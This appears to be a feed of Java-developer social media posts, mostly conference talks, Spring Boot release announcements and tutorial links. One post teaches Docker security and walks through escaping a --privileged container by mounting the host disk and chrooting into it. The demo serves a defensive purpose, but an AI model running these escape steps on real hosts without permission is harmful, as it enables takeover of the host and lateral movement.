Our next #JCON2025 session is live: 'Can We Measure Developer Productivity?' with Eberhard Wolff
Often, the goal of #architecture is to improve #developer #productivity. But what does it mean …
Grab your coffee and hit play: https://youtu.be/zLN_apxG8PM
You're not tired of coding. You're tired of everything else. Grace Jansen & Maarten Vandeperre mapped the escape route. #PlatformEngineering for #Java devs.
Find your golden path: https://javapro.io/2025/04/16/platform-engineering-101-for-java-developers/
I put together a brief guide on how to install Apache Maven (on Linux, MacOS and Windows).
I hope you find it useful! :)
#maven
#java
#apache
#cicd
#buildtools
#devops
#buildtools
#devlearning
#softwaredevelopment
#softwaretesting
Welcome @michele_sollecito!
Michele is a former colleague of mine and one of my key references in Leadership, Software Engineering, TDD, Hexagonal Architecture, Kotlin, and Java. It took me ages to convince him to join Fedi, so please give him a warm welcome!
A grumpy ItSec guy walks through the office when he overhears an exchange of words.
Dev0: Hey, this isn't working, I hate containers...
Dev1: Maybe just add the --privileged flag!
ItSec: Just… no. Simply no. No privileged mode - the grumpy fellow interjects as he walks away.
Dev0: Jesus, fine - no privileged mode.
Dev1: Okay, but… why?
Here's why (one, simple example):
Docker's --privileged flag lifts almost all restrictions from your container - exactly the opposite of --cap-drop=ALL. Let's demo the difference.
1) Start two containers.
docker run -itd --privileged --name ubuntu-privileged ubuntu
docker run -itd --name ubuntu-unprivileged ubuntu
2) Inspect /dev in the unprivileged container.
docker exec -it ubuntu-unprivileged bash
ls /dev
exit
You'll only see a limited set of devices. No disk access.
3) Now inspect /dev in the privileged container.
docker exec -it ubuntu-privileged bash
ls /dev
/dev/sda exposed! Sometimes you may see /dev/mapper when LVM is in place. Then "apt update && apt install -y lvm2" and "lvscan" may help during next phase.
4) Exploitation part (inside the privileged container) - simply mount /dev/sda to any writable path in container.
mkdir /tmp/whatever
mount /dev/sda1 /tmp/whatever
5) You can now enumerate - and access - the Docker host's logical volume.
ls -la /tmp/whatever
6) If you wish, you can even chroot into the host:
chroot /tmp/whatever /bin/bash
The moral of the story is to avoid privileged mode, because in the event of an incident (e.g. an attacker compromising an app running inside a container), you significantly increase the likelihood of successful lateral movement from the container to the Docker host - and from there into the rest of your infrastructure.
Usually the grumpy guy means well. He just doesn't know how to explain it properly.
Expect weird experiments, small failures, maybe surprising results.
Saturday 8pm CET
Streaming on YouTube https://youtube.com/live/lGACZWULwYg
Tracing the Mind of Your AI: Java Observability with Quarkus and LangChain4j
Instrument, trace, and monitor your AI-powered Java apps using local LLMs, Ollama, and OpenTelemetry with zero boilerplate.
https://myfear.substack.com/p/java-ai-observability-quarkus-langchain4j
#Java #LangChain4j #Ollama #OpenTelemetry
HTMLの基本とタグの書き方を初心者向けに解説【JavaWeb入門講座2】HTML入門
https://dev.to/lepsistemas/spring-boot-development-environment-with-docker-and-vs-code-42mg - building with #Java and #SpringBoot in #DevContainers. Nice walk-through https://www.linkedin.com/in/leandro-boeing-vieira/.
Found a java version of the game Mobile Soccer for Symbian s90, screen 640x320, midp 1.0
Of course there are differences from the version for s80, but it is still an interesting find.
#JAVA #Nokia #retrogaming
Our next #JCON2025 session is live: 'Practical AI in Java' with Marcus Hellberg
At this point, we all know it's easy to have an #AI write bad jokes in the console with #Java …
Grab your coffee and hit play: https://youtu.be/cMUQr19OUf8
There is no memory safety without thread safety https://lobste.rs/s/omasxh #go #java #plt
https://www.ralfj.de/blog/2025/07/24/memory-safety.html
#AI is here to stay - and it’s a HUGE opportunity for #Java & #Spring developers!
#SpringAI 1.0 is now available - a comprehensive solution for AI engineering in Java, shaped by rapid advances in the AI space.
In this #InfoQ article, Josh Long examines the new Spring AI 1.0 project and explores how it can be used to integrate AI more effectively!
Learn more: https://bit.ly/4lTYBc3
On behalf of the team and everyone who has contributed, I'm happy to announce that Spring Boot 3.5.4 has been released and is now available from Maven Central.
https://spring.io/blog/2025/07/24/spring-boot-3-5-4-available-now
Only 7 days left until the #CFP closes! Share your insights on #Java25 and reach 20,000+ readers with #JAVAPRO.
Conference distributionSocial media visibilitySubmit multiple articles!
Deadline: July 31
Info & submit here: https://docs.google.com/forms/d/e/1FAIpQLSe7-WA4FP80N3VALYdSBa8MnVR-f_tZyIsnsiUgLx8XHcGwyA/viewform
Java didn’t survive 30 years by standing still. Want to know why #Java’s still everywhere? Because its #APIs never stop adapting. Vipin Menon digs through the layers—from AWT to Loom, JDBC to HTTP/2.
Dig in: https://javapro.io/2025/05/20/a-journey-through-30-years-of-api-evolution/
#Java + #AI = Sounds a bit like Jarvis!
Join Edward Burns at #JCONUSA25 @ #IBM #TechXchange (Oct 6-9) as he showcases #LangChain4j-cdi and how you can bring AI Power to Java so that you might become the next Tony Stark.
Get your tickets now: https://usa.jcon.one/register
On behalf of the team and everyone who has contributed, I'm happy to announce that Spring Boot 3.4.8 has been released and is now available from Maven Central.
https://spring.io/blog/2025/07/24/spring-boot-3-4-8-available-now
